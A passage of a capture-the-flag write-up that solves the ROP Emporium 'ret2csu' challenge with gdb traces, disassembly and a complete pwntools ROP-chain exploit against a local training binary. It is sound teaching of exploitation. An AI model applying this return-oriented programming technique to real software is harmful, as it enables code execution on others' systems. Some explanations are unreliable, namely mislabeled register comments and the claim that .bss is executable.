<span class="nf">Starting</span> <span class="nv">program</span><span class="p">:</span> <span class="o">/</span><span class="nv">home</span><span class="o">/</span><span class="nv">vx</span><span class="o">/</span><span class="nv">Downloads</span><span class="o">/</span><span class="nv">rop</span><span class="o">/</span><span class="nv">rop</span><span class="o">/</span><span class="nv">ret2csu</span><span class="o">/</span><span class="nv">ret2csu</span> <span class="o">&lt;/</span><span class="nv">tmp</span><span class="o">/</span><span class="nv">payload</span>

<span class="nf">Breakpoint</span> <span class="mi">1</span><span class="p">,</span> <span class="mh">0x000000000040069a</span> <span class="nv">in</span> <span class="nv">__libc_csu_init</span> <span class="p">()</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nv">c</span>
<span class="nf">Continuing.</span>
<span class="nf">ret2csu</span> <span class="nv">by</span> <span class="nv">ROP</span> <span class="nv">Emporium</span>
<span class="nf">x86_64</span>
<span class="nf">Breakpoint</span> <span class="mi">1</span><span class="p">,</span> <span class="mh">0x000000000040069a</span> <span class="nv">in</span> <span class="nv">__libc_csu_init</span> <span class="p">()</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>When the program is run,it hits the set breakpoint. Type <strong>c</strong> command for paused process to continue the execution. When the program finishes the execution, the return address now points back to the address of our first gadget, Because of breakpoint, the execution stops. We can inspect the memory to understand the behavior of the program and values loaded in the registers.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre><span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nv">x</span><span class="o">/</span><span class="mi">10</span><span class="nv">i</span> <span class="kc">$</span><span class="nv">rip</span>
<span class="err">=&gt;</span> <span class="err">0</span><span class="nf">x40069a</span> <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">90</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">pop</span>    <span class="nb">rbx</span>
   <span class="err">0</span><span class="nf">x40069b</span> <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">91</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">pop</span>    <span class="nb">rbp</span>
   <span class="err">0</span><span class="nf">x40069c</span> <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">92</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">pop</span>    <span class="nv">r12</span>
   <span class="err">0</span><span class="nf">x40069e</span> <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">94</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">pop</span>    <span class="nv">r13</span>
   <span class="err">0</span><span class="nf">x4006a0</span> <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">96</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">pop</span>    <span class="nv">r14</span>
   <span class="err">0</span><span class="nf">x4006a2</span> <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">98</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">pop</span>    <span class="nv">r15</span>
   <span class="err">0</span><span class="nf">x4006a4</span> <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">100</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">ret</span>
   <span class="err">0</span><span class="nl">x4006a5:</span>	<span class="nf">nop</span>
   <span class="err">0</span><span class="nl">x4006a6:</span>	<span class="nf">nop</span>    <span class="kt">WORD</span> <span class="nv">PTR</span> <span class="nb">cs</span><span class="p">:[</span><span class="nb">rax</span><span class="o">+</span><span class="nb">rax</span><span class="o">*</span><span class="mi">1</span><span class="o">+</span><span class="mh">0x0</span><span class="p">]</span>
   <span class="err">0</span><span class="nf">x4006b0</span> <span class="o">&lt;</span><span class="nv">__libc_csu_fini</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">repz</span> <span class="nv">ret</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now we can Single step in the debugger and view the values stored in the registers of our gadget. The command for single stepping in gdb is <strong>si</strong>.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre><span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nv">i</span> <span class="nv">r</span> <span class="nb">rbx</span> <span class="nb">rbp</span> <span class="nv">r12</span> <span class="nv">r13</span> <span class="nv">r14</span> <span class="nv">r15</span>
<span class="nf">rbx</span>            <span class="mh">0x4343434343434343</span>  <span class="mi">4846791580151137091</span>
<span class="nf">rbp</span>            <span class="mh">0x4242424242424242</span>  <span class="mh">0x4242424242424242</span>
<span class="nf">r12</span>            <span class="mh">0x4141414141414141</span>  <span class="mi">4702111234474983745</span>
<span class="nf">r13</span>            <span class="mh">0xdeadbeefdeadbeef</span>  <span class="o">-</span><span class="mi">2401053088876216593</span>
<span class="nf">r14</span>            <span class="mh">0xcafebabecafebabe</span>  <span class="o">-</span><span class="mi">3819410105351357762</span>
<span class="nf">r15</span>            <span class="mh">0xd00df00dd00df00d</span>  <span class="o">-</span><span class="mi">3454841397007486963</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>From assembly code code above we are able to control all the register value in our chain using our generated payload file. The code for generating the payload is shown below.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre><span class="nf">import</span> <span class="nv">pwn</span>

<span class="nf">pop_gadget</span> <span class="err">=</span> <span class="nv">pwn.p64</span><span class="p">(</span><span class="mh">0x0040069a</span><span class="p">)</span>
<span class="nf">payload</span> <span class="err">=</span><span class="nv">b</span><span class="s">"A"</span><span class="o">*</span><span class="mi">32</span> <span class="err">#</span><span class="nv">fill</span> <span class="nv">the</span> <span class="nv">buffer</span>
<span class="nf">payload</span> <span class="o">+</span><span class="err">=</span><span class="nv">b</span><span class="s">"B"</span><span class="o">*</span><span class="mi">8</span> <span class="err">#</span><span class="nb">rbp</span><span class="p">(</span><span class="nv">saved</span><span class="p">)</span>
<span class="nf">payload</span> <span class="o">+</span><span class="err">=</span> <span class="nv">pop_gadget</span>  <span class="err">#</span><span class="nv">retaddr</span>
<span class="nf">payload</span> <span class="o">+</span><span class="err">=</span> <span class="nv">pwn.p64</span><span class="p">(</span><span class="mh">0x4343434343434343</span><span class="p">)</span><span class="err">#</span><span class="nb">rbx</span>
<span class="nf">payload</span> <span class="o">+</span><span class="err">=</span> <span class="nv">pwn.p64</span><span class="p">(</span><span class="mh">0x4242424242424242</span><span class="p">)</span><span class="err">#</span><span class="nb">rbp</span>
<span class="nf">payload</span> <span class="o">+</span><span class="err">=</span> <span class="nv">pwn.p64</span><span class="p">(</span><span class="mh">0x4141414141414141</span><span class="p">)</span> <span class="err">#</span><span class="nv">r12</span>
<span class="nf">payload</span> <span class="o">+</span><span class="err">=</span> <span class="nv">pwn.p64</span><span class="p">(</span><span class="mh">0xdeadbeefdeadbeef</span><span class="p">)</span> <span class="err">#</span><span class="nv">r13</span>
<span class="nf">payload</span> <span class="o">+</span><span class="err">=</span> <span class="nv">pwn.p64</span><span class="p">(</span><span class="mh">0xcafebabecafebabe</span><span class="p">)</span> <span class="err">#</span><span class="nv">r14</span>
<span class="nf">payload</span> <span class="o">+</span><span class="err">=</span> <span class="nv">pwn.p64</span><span class="p">(</span><span class="mh">0xd00df00dd00df00d</span><span class="p">)</span> <span class="err">#</span><span class="nv">r15</span>
<span class="nf">open</span><span class="p">(</span><span class="s">'payload'</span><span class="p">,</span> <span class="s">'wb'</span><span class="p">)</span><span class="nv">.write</span><span class="p">(</span><span class="nv">payload</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Next step is determining the correct or desired values for <strong>rbx, rbp and r12</strong> registers because 0x41‚Ä¶, 0x42‚Ä¶., 0x43‚Ä¶ are not valid memory addresses.For execution of second rop gadget chain, we need to set right values of <code class="language-plaintext highlighter-rouge">rbp</code> and <code class="language-plaintext highlighter-rouge">rbx</code> due to a loop conditional.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>   <span class="err">0</span><span class="nf">x0000000000400680</span> <span class="o">&lt;+</span><span class="mi">64</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rdx</span><span class="p">,</span><span class="nv">r15</span>
   <span class="err">0</span><span class="nf">x0000000000400683</span> <span class="o">&lt;+</span><span class="mi">67</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rsi</span><span class="p">,</span><span class="nv">r14</span>
   <span class="err">0</span><span class="nf">x0000000000400686</span> <span class="o">&lt;+</span><span class="mi">70</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="nb">r13d</span>
   <span class="err">0</span><span class="nf">x0000000000400689</span> <span class="o">&lt;+</span><span class="mi">73</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="kt">QWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nv">r12</span><span class="o">+</span><span class="nb">rbx</span><span class="o">*</span><span class="mi">8</span><span class="p">]</span>
   <span class="err">0</span><span class="nf">x000000000040068d</span> <span class="o">&lt;+</span><span class="mi">77</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">add</span>    <span class="nb">rbx</span><span class="p">,</span><span class="mh">0x1</span>
   <span class="err">0</span><span class="nf">x0000000000400691</span> <span class="o">&lt;+</span><span class="mi">81</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">cmp</span>    <span class="nb">rbp</span><span class="p">,</span><span class="nb">rbx</span>
   <span class="err">0</span><span class="nf">x0000000000400694</span> <span class="o">&lt;+</span><span class="mi">84</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">jne</span>    <span class="mh">0x400680</span> <span class="o">&lt;</span><span class="nv">__libc_csu_init</span><span class="o">+</span><span class="mi">64</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000400696</span> <span class="o">&lt;+</span><span class="mi">86</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">add</span>    <span class="nb">rsp</span><span class="p">,</span><span class="mh">0x8</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Second gadget starts at <strong>0x0000000000400680</strong>,in which we are set values of rdi,r14 and rdx with correct argument values. Set values of <strong>rbx</strong> and <strong>rbp</strong> correctly so that conditional <strong>cmp</strong> is always true. Because of add instruction of 1 to rbx, <code class="language-plaintext highlighter-rouge">rbx</code> value needs to be 0 and <code class="language-plaintext highlighter-rouge">rbp</code> value to 1. when the registers are compared, the values are equal and Zero flag is set.</p>

<p>NB: ‚ÄúAdjust values in payload script and single step to confirm the validity of new values in the memory.‚Äù</p>

<p>For register <strong>r12</strong>, the address should lie in executable memory address. The <strong>.bss</strong> section is executable, therefore r12 should be set to memory address of bss section. After executing our second rop chain gadget, we need to adjust the stack as shown in the exploit code to avoid segmentation fault.</p>

<p>Lastly we need to control the <strong>rdi</strong> register with the value <strong>0xdeadbeefdeadbeef</strong>. Because we have full control of rdx and rsi register, next is to look for a <code class="language-plaintext highlighter-rouge">pop rdi, ret</code> gadget.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>  <span class="err">0</span><span class="nf">x004006a3</span>                 <span class="mi">5</span><span class="nv">f</span>  <span class="nv">pop</span> <span class="nb">rdi</span>
  <span class="err">0</span><span class="nf">x004006a4</span>                 <span class="nv">c3</span>  <span class="nv">ret</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now we can pass the <strong>0xdeadbeefdeadbeef</strong> argument to the ret2win function.Now we have all the correct values of rdi, rsi and rdx correctly set, calling the ret2win function will result to us getting the correct flag.</p>

<p>The full code of the rop chain is as shown below.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
</pre></td> --><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">pwn</span>

<span class="n">pwn</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">encoding</span> <span class="o">=</span> <span class="s">"latin-1"</span>
<span class="n">pwn</span><span class="p">.</span><span class="n">warnings</span><span class="p">.</span><span class="n">simplefilter</span><span class="p">(</span><span class="s">"ignore"</span><span class="p">)</span>
<span class="n">pwn</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s">"amd64"</span>
<span class="n">io</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">process</span><span class="p">(</span><span class="s">'./ret2csu'</span><span class="p">)</span>

<span class="c1">#arguments passed to ret2win function ret2win(arg1, arg2, arg3)
</span><span class="n">arg1</span> <span class="o">=</span><span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0xdeadbeefdeadbeef</span><span class="p">)</span>
<span class="n">arg2</span> <span class="o">=</span><span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0xcafebabecafebabe</span><span class="p">)</span>
<span class="n">arg3</span> <span class="o">=</span><span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0xd00df00dd00df00d</span><span class="p">)</span>

<span class="n">ret2win_addr</span> <span class="o">=</span><span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">elf</span><span class="p">.</span><span class="n">plt</span><span class="p">[</span><span class="s">'ret2win'</span><span class="p">])</span>   <span class="c1">#resolve address of ret2win function
</span><span class="n">pop_rbx_rbp_r12_r13_r14_r15_addr</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x0040069a</span><span class="p">)</span>  <span class="c1">#first stage gadget
</span><span class="n">dereference_pointer</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x00600e48</span><span class="p">)</span>  <span class="c1">#bss area which is executable
</span><span class="n">stage2_addr</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x00400680</span><span class="p">)</span>  <span class="c1">#addr of second stage rop chain
</span><span class="n">pop_rdi</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x004006a3</span><span class="p">)</span>

<span class="c1"># ropchains
#stage1 ropchain
</span><span class="s">'''
            0x0040069a      pop   rbx
‚îÇ           0x0040069b      pop   rbp
‚îÇ           0x0040069c      pop   r12
‚îÇ           0x0040069e      pop   r13
‚îÇ           0x004006a0      pop   r14
‚îÇ           0x004006a2      pop   r15
‚îî           0x004006a4      ret
'''</span>
<span class="c1">#Determine the loop values for conditional branch
</span><span class="s">'''
‚ïé‚îÇ          0x00400689      call  qword [r12 + rbx*8]
‚îÇ      ‚ïé‚îÇ   0x0040068d      add   rbx, 1
‚îÇ      ‚ïé‚îÇ   0x00400691      cmp   rbp, rbx
‚îÇ      ‚îî‚îÄ‚îÄ&lt; 0x00400694      jne   0x400680
'''</span>

<span class="n">stage1</span> <span class="o">=</span> <span class="n">pop_rbx_rbp_r12_r13_r14_r15_addr</span>
<span class="n">stage1</span> <span class="o">+=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>   <span class="c1">#set RBP=0
</span><span class="n">stage1</span> <span class="o">+=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>   <span class="c1">#set RBX=1
</span><span class="n">stage1</span> <span class="o">+=</span> <span class="n">dereference_pointer</span> <span class="c1">#set R12
</span><span class="n">stage1</span> <span class="o">+=</span> <span class="n">arg1</span>   <span class="c1">#R13
</span><span class="n">stage1</span> <span class="o">+=</span> <span class="n">arg2</span>   <span class="c1">#R14
</span><span class="n">stage1</span> <span class="o">+=</span> <span class="n">arg3</span>   <span class="c1">#R15
</span><span class="n">stage1</span> <span class="o">+=</span> <span class="n">stage2_addr</span>
<span class="n">stage1</span> <span class="o">+=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">*</span><span class="mi">7</span>   <span class="c1">#adjust the stack
</span>
<span class="c1">#stage2
</span><span class="s">'''
   ‚îå‚îÄ‚îÄ&gt;     0x00400680      mov   rdx, r15
‚îÇ      ‚ïé‚îÇ   0x00400683      mov   rsi, r14
‚îÇ      ‚ïé‚îÇ   0x00400686      mov   edi, r13d
‚îÇ      ‚ïé‚îÇ   0x00400689      call  qword [r12 + rbx*8]
'''</span>

<span class="n">stage2</span> <span class="o">=</span> <span class="n">pop_rdi</span>
<span class="n">stage2</span> <span class="o">+=</span><span class="n">arg1</span>
<span class="n">stage2</span> <span class="o">+=</span><span class="n">ret2win_addr</span>

<span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span><span class="o">*</span><span class="mi">32</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"B"</span><span class="o">*</span><span class="mi">8</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">""</span> <span class="p">.</span><span class="n">join</span><span class="p">([</span>
    <span class="n">stage1</span><span class="p">,</span>
    <span class="n">stage2</span>
    <span class="p">])</span>

<span class="n">io</span><span class="p">.</span><span class="n">writeafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
<span class="n">pwn</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvall</span><span class="p">().</span><span class="n">decode</span><span class="p">())</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Running the code above we get correct flag</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre>vx@archie:ret2csu<span class="nv">$ </span>python3 xpl.py
<span class="o">[</span>+] Starting <span class="nb">local </span>process <span class="s1">'./ret2csu'</span>: pid 18869
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE <span class="o">(</span>0x400000<span class="o">)</span>
    RUNPATH:  b<span class="s1">'.'</span>
<span class="o">[</span>+] Receiving all data: Done <span class="o">(</span>45B<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Process <span class="s1">'./ret2csu'</span> stopped with <span class="nb">exit </span>code 0 <span class="o">(</span>pid 18869<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span>  Thank you!
    ROPE<span class="o">{</span>a_placeholder_32byte_flag!<span class="o">}</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>References</p>

<ol>
  <li><a href="https://i.blackhat.com/briefings/asia/2018/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf"> Universal ROP or Return-to-csu</a></li>
  <li><a href="http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html">Linux program startup</a></li>
</ol>
:ET